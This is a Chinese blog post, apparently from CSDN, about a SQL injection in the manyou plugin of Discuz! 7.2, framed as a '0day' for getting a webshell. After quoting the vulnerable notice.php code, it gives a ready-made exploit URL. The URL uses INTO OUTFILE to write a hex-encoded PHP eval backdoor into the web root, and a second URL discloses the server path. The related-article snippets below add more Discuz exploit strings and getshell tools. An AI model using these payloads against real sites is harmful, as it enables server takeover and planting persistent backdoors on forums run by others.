7.2 discuz 拿shell_discuz! 7.2 manyou插件暴路径&Get Webshell 0day

最新推荐文章于 2023-05-15 17:41:42 发布
最新推荐文章于 2023-05-15 17:41:42 发布
阅读量102 收藏
点赞数
文章标签: 7.2 discuz 拿shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42571444/article/details/113000275
版权

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

漏洞分析:

文件./manyou/sources/notice.php

相关代码:

if($option == 'del') {

$appid = intval($_GET['appid']);

$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} elseif($option == 'deluserapp') {

$hash = trim($_GET['hash']);    //此处并没有进行过滤,直接导致注入的产生

if($action == 'invite') {

$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

if($value = $db->fetch_array($query)) {

$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action=invite');

} else {

showmessage('manyou:noperm');

}

} else {

$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice');

}

}

很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

/manyou/admincp.php?my_suffix=%0A%0DTOBY57    爆路径

高榕资本
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
7.2 discuzshell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...
weixin_39748928的博客
12-22 347
我网站 最近老被入侵就在网上 查了查 不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径然后直接getshelluserapp.php?script=notice&view=all&option=deluserapp&action=invite&am...
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8316
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
oday-------------powered by discuz! 7.2
weixin_34240520的博客
05-23 474
利用google搜索关键字 intxt:powered by discuz! 7.2 找到一个论坛,注册一个账号注册好后,使用exp http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).ch...
discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
收集盒 Book box
03-20 2501
<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。<br />一 Discuz! 6.0 和 Discuz! 7.0<br />既然要后台拿Shell,文件写入必看。<br />/include/cache.func.php<br /><br />往上翻,找到调用函数的地方.都在updateca
价值500元拿webshell0day.rar
08-01
本文将深入探讨“价值500元拿webshell0day.rar”这个压缩包所涉及的知识点,包括Webshell的原理、0day漏洞的概念以及相关工具的使用。 首先,Webshell是攻击者在成功入侵网站后,为了长期控制和管理被黑服务器而...
我的一键_getshell_代码开发之路.pdf
08-11
一、我是谁 二、我的安全开发之路 三、合格代码? 四、自动化渗透 五、总结
2019-新闻原getshell.rar
09-26
标题中的“2019-新闻原getshell.rar”表明这是一个关于2019年针对新闻源网站的getshell工具的压缩文件。Getshell通常指的是在Web安全领域中,攻击者通过利用网站漏洞获取服务器的命令执行权限,从而能够上传webshell...
Decryption-WEBSHELL.rar_asp webshell_webshell_webshell asp
09-24
"Decryption-WEBSHELL.rar_asp webshell_webshell_webshell asp"这个标题表明这是一个关于ASP Webshell的解密版本,主要关注的是如何解密那些通常加密的Webshell,以及去除其中可能存在的后门程序。 Webshell,也...
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4193
Discuz v3.4系列 远程代码执行漏洞全流程详解
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
Python写的Discuz7.2版faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*- # author iswin import sys import hashlib import time import math import base64 import urllib2 import urllib import r
Dz7.2 从获取uc key到getshell
weixin_30256901的博客
01-23 357
0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0x02获取uc key exp: faq.php?action=grouppermission&gids[99]='&amp...
复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理
Au
10-18 4144
源码~   http://pan.baidu.com/s/1gfkvJrX poc /faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20fr...
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 464
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
discuz! 7.2 manyou插件路径&Get Webshell 0day
04-06 1084
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。漏洞分析:文件./manyou/sources/notice.php相关代码:if($option == del) {$appid = intval($_GET[appid]);$db->query("DELETE
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
weixin_34067049的博客
07-18 1281
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
DZ拿shell总结
weixin_30600503的博客
01-23 775
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
webshell 和getshell区别
最新发布
07-11
Webshell和Getshell是两个常用的黑客术语,分别表示通过不同的方式获取对目标服务器的控制权限。 Webshell指的是将一段可执行的代码上传至目标服务器,通过访问该代码来获取服务器的控制权限。这段代码通常是以脚本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值